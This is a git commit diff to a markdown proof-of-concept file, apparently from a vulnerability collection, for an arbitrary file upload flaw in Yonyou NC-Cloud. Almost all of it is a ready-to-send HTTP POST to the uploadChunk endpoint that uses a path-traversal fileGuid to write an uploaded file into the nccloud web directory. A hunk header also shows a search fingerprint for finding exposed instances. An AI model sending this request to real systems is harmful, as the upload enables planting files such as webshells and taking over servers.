Update 用友NC-Cloud uploadChunk 任意文件上传漏洞.md

2023-11-24 19:49:58 +08:00 · 2023-11-24 19:49:58 +08:00 · 2bf81d4807
commit 2bf81d4807
parent 38d1f1e47a
1 changed files with 6 additions and 2 deletions
--- a/任意文件上传漏洞.md
+++ b/任意文件上传漏洞.md
@ -7,12 +7,16 @@ app="用友-NC-Cloud"


 ## POC
+
 ```
 POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
 Host: {{Hostname}}
-Content-Type: multipart/form-data;
+Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
+
+--024ff46f71634a1c9bf8ec5820c26fa9--
 Content-Disposition: form-data; name="file"; filename="test.txt"
-{{randstr}}
+
+1123213
 --024ff46f71634a1c9bf8ec5820c26fa9--

 ```